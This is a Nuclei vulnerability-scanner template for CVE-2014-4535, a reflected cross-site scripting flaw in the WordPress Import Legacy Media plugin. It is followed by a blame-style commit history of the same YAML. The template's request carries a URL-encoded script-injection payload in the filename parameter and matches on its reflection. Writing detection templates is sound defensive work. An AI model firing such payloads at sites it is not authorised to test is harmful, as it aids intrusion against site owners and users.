nuclei-templates/cves/2014/CVE-2014-4535.yaml

id: CVE-2014-4535

info:
  name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
  tags: cve,cve2014,wordpress,wp-plugin,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2014-4535
    cwe-id: CWE-79
  description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "'></script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
-												Create CVE-2014-4535.yaml
											
										
										
											2021-07-29 22:51:07 +00:00
+								id: CVE-2014-4535
 								info:
 								  name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 								  author: daffainfo
 								  severity: medium
-												Removed pipe (|) character from references, because the structure requires it to be a string slice, not a string

Related nuclei tickets:
* #259 - dynamic key-value field support for template information
* #940 - new infos in template
* #834
* RES-84

											
										
										
											2021-08-19 13:59:12 +00:00
+								  reference:
-												Create CVE-2014-4535.yaml
											
										
										
											2021-07-29 22:51:07 +00:00
+								    - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
 								    - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
 								  tags: cve,cve2014,wordpress,wp-plugin,xss
-												Added cve annotations + severity adjustments

											
										
										
											2021-09-10 11:26:40 +00:00
+								  classification:
 								    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 								    cvss-score: 6.10
 								    cve-id: CVE-2014-4535
 								    cwe-id: CWE-79
 								  description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
-												Create CVE-2014-4535.yaml
											
										
										
											2021-07-29 22:51:07 +00:00
 								requests:
 								  - method: GET
 								    path:
-												Update CVE-2014-4535.yaml
											
										
										
											2021-07-31 03:30:47 +00:00
+								      - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
-												Create CVE-2014-4535.yaml
											
										
										
											2021-07-29 22:51:07 +00:00
 								    matchers-condition: and
 								    matchers:
 								      - type: word
 								        words:
-												Update CVE-2014-4535.yaml
											
										
										
											2021-07-31 03:30:47 +00:00
+								          - "'></script><script>alert(document.domain)</script>"
-												Create CVE-2014-4535.yaml
											
										
										
											2021-07-29 22:51:07 +00:00
+								        part: body
 								      - type: word
 								        part: header
 								        words:
 								          - text/html
 								      - type: status
 								        status:
 								          - 200